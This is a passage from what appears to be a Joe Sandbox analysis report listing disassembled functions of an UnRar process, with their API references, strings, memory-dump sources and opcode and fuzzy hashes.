                                                            • Instruction ID: cdd4818e484f84d28f7e2623cdd3c75f4d6030d6da4dae6ef1ff713d09a08c06
                                                            • Opcode Fuzzy Hash: d367f6124c47eb162298c6a48e7816a7c1f9b551d7818521d693f573aa8fc126
                                                            • Instruction Fuzzy Hash: 6741E462F0FB03C1FA56AB12981017DE2D5BF48B90F8A4575DD6E4B7A8DE3CE4428360
                                                            Function 00007FF7AAD05060 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                            • Instruction ID: 9dd02bacff4f4da93c2db83e61dc88c4892e39c752459ee2b617ff19182a634e
                                                            • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                            • Instruction Fuzzy Hash: 6611D026E09603C1F6143124D44237D8425EF993A0E96CEBCEDFF021FECE2C68564360
                                                            Function 00007FF7AACD6D34 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 286COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                            • String ID: *.rev
                                                            • API String ID: 3587649625-4213698400
                                                            • Opcode ID: 8eb4fc9fa8ed1e1b394ad6543a9f90fb85e6f0ff2954cb6d37c95e28fe69c8d2
                                                            • Instruction ID: 0ed150592506a96ff3a95c61ba83ffc3850c13a0b51611cc9773ae413ae45343
                                                            • Opcode Fuzzy Hash: 8eb4fc9fa8ed1e1b394ad6543a9f90fb85e6f0ff2954cb6d37c95e28fe69c8d2
                                                            • Instruction Fuzzy Hash: D7D1C662A1AAC1D4FF30AF20D8402EDA361FB50798F815631D65D0BAE9DF3CE646C750
                                                            Function 00007FF7AACBD654 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7AACE4050: MessageBeep.USER32(?,?,?,?,00007FF7AACBDC84,?,?,?,?,?,?,?,?,?,00007FF7AACE4013), ref: 00007FF7AACE4072
                                                              • Part of subcall function 00007FF7AACDB3AC: LoadStringW.USER32 ref: 00007FF7AACDB433
                                                              • Part of subcall function 00007FF7AACDB3AC: LoadStringW.USER32 ref: 00007FF7AACDB44C
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACBD9EB
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACBD9F1
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACBD9FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$LoadString$BeepMessagefflush
                                                            • String ID: %s:
                                                            • API String ID: 1811793778-1393465352
                                                            • Opcode ID: 55f59e603fcd52754f0b7c9521efcd2bfd1a618055e72a321dc3ea1911483b28
                                                            • Instruction ID: af6c0a3bfdf92b46d06224c00ce3544a5e1c470b7a3e7b064c872a9577d75d44
                                                            • Opcode Fuzzy Hash: 55f59e603fcd52754f0b7c9521efcd2bfd1a618055e72a321dc3ea1911483b28
                                                            • Instruction Fuzzy Hash: 39A1B062F16742C8FF00EBA5D4843AC6371AB447A8F954676DE2D17AE9DF39D482C320
                                                            Function 00007FF7AACCEC04 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                            • API String ID: 233258989-622958660
                                                            • Opcode ID: dd595c9083aad785f97bdefceedbbdd0d4bb99c3aa0eaeaf0664c3717691909c
                                                            • Instruction ID: 21f89f7ae040282e772dacec8466c488a8f28672c76333470f0433a7f08d7ba6
                                                            • Opcode Fuzzy Hash: dd595c9083aad785f97bdefceedbbdd0d4bb99c3aa0eaeaf0664c3717691909c
                                                            • Instruction Fuzzy Hash: D4513BF3F386848AF7658F1CE841BA86650F365B90F851A34F94A92B54CB3CDA45C700
                                                            Function 00007FF7AACF4D5C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: __except_validate_context_recordabort
                                                            • String ID: csm$csm
                                                            • API String ID: 746414643-3733052814
                                                            • Opcode ID: ad89102610576a47f106cefac6410219eb02e751a273e906b35c4e8110bb8aaa
                                                            • Instruction ID: 650b4cee791a573381e2eb1ea4ebc65c8810fd1da1426f75dead4c9a4fa56c01
                                                            • Opcode Fuzzy Hash: ad89102610576a47f106cefac6410219eb02e751a273e906b35c4e8110bb8aaa
                                                            • Instruction Fuzzy Hash: 9671C23390A782CAFB20AF25D16067DBBA0EB04B85F46C176DA4C47AA9CB3CD552C750
                                                            Function 00007FF7AAD013AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$StringType
                                                            • String ID: $%s
                                                            • API String ID: 3586891840-3791308623
                                                            • Opcode ID: 9582bb10309dd8dc85e2d0c36fd56e8abc20e0a4a4740bb48ae78edd53c93f1d
                                                            • Instruction ID: 58866b9ad5eb7056cbaa3350ca232c44c2534654de0d60c434f594f08351fa3f
                                                            • Opcode Fuzzy Hash: 9582bb10309dd8dc85e2d0c36fd56e8abc20e0a4a4740bb48ae78edd53c93f1d
                                                            • Instruction Fuzzy Hash: 0441982371678285FB519F65D8002ADA391FB44BA8F850675EE6E477E8DF3CD4468310
                                                            Function 00007FF7AACF51A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                            • String ID: csm
                                                            • API String ID: 2466640111-1018135373
                                                            • Opcode ID: 9dfea07b92c9d6451de2ece4ec45c741a510eac4fc31931c05233842037924e7
                                                            • Instruction ID: c7f1e776b95b68489d1c7329bd60943cf4e3cdeb8d4ee720fd4cd5eaafa065e4
                                                            • Opcode Fuzzy Hash: 9dfea07b92c9d6451de2ece4ec45c741a510eac4fc31931c05233842037924e7
                                                            • Instruction Fuzzy Hash: FE515B3761A742C7F624BF15A15026EB7A4FB88B90F520178DB8D07B65CF38E462CB10
                                                            Function 00007FF7AACFEB78 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                            • String ID: U
                                                            • API String ID: 2456169464-4171548499
                                                            • Opcode ID: c19a15270a16a9057a9e597eae08daa20b448d47eb23cc31b046e5867ddae617
                                                            • Instruction ID: 097f482b7695a95e12f678ec1a2cce4a1f2bf05b06d9a6bbe7980300984b118b
                                                            • Opcode Fuzzy Hash: c19a15270a16a9057a9e597eae08daa20b448d47eb23cc31b046e5867ddae617
                                                            • Instruction Fuzzy Hash: 5D418222A1AB42C6F720AF29E4543BDA760FB88794F854131EA4D877A8DF7CD542C750
                                                            Function 00007FF7AACCB318 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: InformationVolume_invalid_parameter_noinfo_noreturn
                                                            • String ID: FAT$FAT32
                                                            • API String ID: 4269842375-1174603449
                                                            • Opcode ID: 77736bf6a15eee03611a9c0147cd158c7217c5462422499012f11dd6ef0edbcc
                                                            • Instruction ID: e61fd62d2c691d19b32b534728cdbbed0e3aac4ff3959da3a12cb6fc5e47c43a
                                                            • Opcode Fuzzy Hash: 77736bf6a15eee03611a9c0147cd158c7217c5462422499012f11dd6ef0edbcc
                                                            • Instruction Fuzzy Hash: 26318D3260AB82C1FA10AFA5E4903AEE361FB84354FC51175E79D47AA9DF7CE446CB10
                                                            Function 00007FF7AACE293C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: a2414bb2134a9a6a6fad677f4a3bcf7d934fd639661b7c066a7f7c644abdbd5f
                                                            • Instruction ID: 7bd115057a9eb12afd106659914b81502add120001370340fe5aec6dc307e8af
                                                            • Opcode Fuzzy Hash: a2414bb2134a9a6a6fad677f4a3bcf7d934fd639661b7c066a7f7c644abdbd5f
                                                            • Instruction Fuzzy Hash: B421EB32B16641C6F7509F25D0543BD7291FB98B0CF558074CA4D0A6ADDF7E9447C7A0
                                                            Function 00007FF7AACC2F98 Relevance: 6.2, APIs: 4, Instructions: 236timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                            • String ID:
                                                            • API String ID: 1137671866-0
                                                            • Opcode ID: 473f9ede41237043064160fbbb82d5e1405ba20586e154ccce073c6fd81b137f
                                                            • Instruction ID: a5da2295274661fc376b5ace90b2499548bb5be88b65a7bb1c6bb4f0325d7baa
                                                            • Opcode Fuzzy Hash: 473f9ede41237043064160fbbb82d5e1405ba20586e154ccce073c6fd81b137f
                                                            • Instruction Fuzzy Hash: 3DA1A422A1AB82D1FA10EF25E4411BEE361FB85794F816171EA9D13BBADF3CD546C310
                                                            Function 00007FF7AACE34E4 Relevance: 6.2, APIs: 4, Instructions: 234COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                            • String ID:
                                                            • API String ID: 4097890229-0
                                                            • Opcode ID: be58fc8cb8b634ce4264401db8893d8ce005b3f7d6705333ba5879cec61c78bb
                                                            • Instruction ID: 35bcde4eefcaa7a562b81e0a9101d7745bda1bc9a68779b0dffb4fb8fa1e01ae
                                                            • Opcode Fuzzy Hash: be58fc8cb8b634ce4264401db8893d8ce005b3f7d6705333ba5879cec61c78bb
                                                            • Instruction Fuzzy Hash: 43A1A062B09B81C5FB10EB68D4440ACA771FB957A4F915235EEAC13BEADF38E585C310
                                                            Function 00007FF7AACC8E40 Relevance: 6.2, APIs: 4, Instructions: 219COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                            • String ID:
                                                            • API String ID: 3936042273-0
                                                            • Opcode ID: 3e543fe064c7750c6ba74e8c0c748e8204197175e366bde09871ce46c9877ea7
                                                            • Instruction ID: e1f767e03158a7380f4e0a2b4ce1eec3a1f5ce7e3eaf17048a746a65b50faf00
                                                            • Opcode Fuzzy Hash: 3e543fe064c7750c6ba74e8c0c748e8204197175e366bde09871ce46c9877ea7
                                                            • Instruction Fuzzy Hash: C091BF62B06B42D9FB00EFA4E0542EDA372EB04798F815675DE2D13AE9DE3CD516C360
                                                            Function 00007FF7AACFD424 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 4141327611-0
                                                            • Opcode ID: 3f8a9ae6f7b22d36c5fe1166e550f4e148379cff3dbd39583ef566bdccd85d42
                                                            • Instruction ID: 0cc149eb325bd366ee3e7825fd637f7ea36e6701a6572ef2ca5db898746fe3fb
                                                            • Opcode Fuzzy Hash: 3f8a9ae6f7b22d36c5fe1166e550f4e148379cff3dbd39583ef566bdccd85d42
                                                            • Instruction Fuzzy Hash: 98419663A0E743C6FB66AB10906037DE6A0AF54798F968176DA5D07AE5CE3CE443C720
                                                            Function 00007FF7AACCBC5C Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3823481717-0
                                                            • Opcode ID: ae489b75429a7c487668812a89cd2d37f8c8aa87e54592b1ba87b543757add07
                                                            • Instruction ID: 193cbcd2b94bd65dddd8fada30b4dcc65818562373865e844af0dc397d41f678
                                                            • Opcode Fuzzy Hash: ae489b75429a7c487668812a89cd2d37f8c8aa87e54592b1ba87b543757add07
                                                            • Instruction Fuzzy Hash: E041A762F16752C4FB00EFB5E8442AC6371FF44BA4B911235DE5D2AAAADF78D446C310
                                                            Function 00007FF7AACCB7D4 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2359106489-0
                                                            • Opcode ID: 86504ef2caa24374c66e50ec8a1881e1c1ab050ee7e1075638928e5291bdeaa1
                                                            • Instruction ID: c6ac23f6a5239ac0c9caa4799b74bdad0d028ced66a1763ab5b2c3ce7b5d2274
                                                            • Opcode Fuzzy Hash: 86504ef2caa24374c66e50ec8a1881e1c1ab050ee7e1075638928e5291bdeaa1
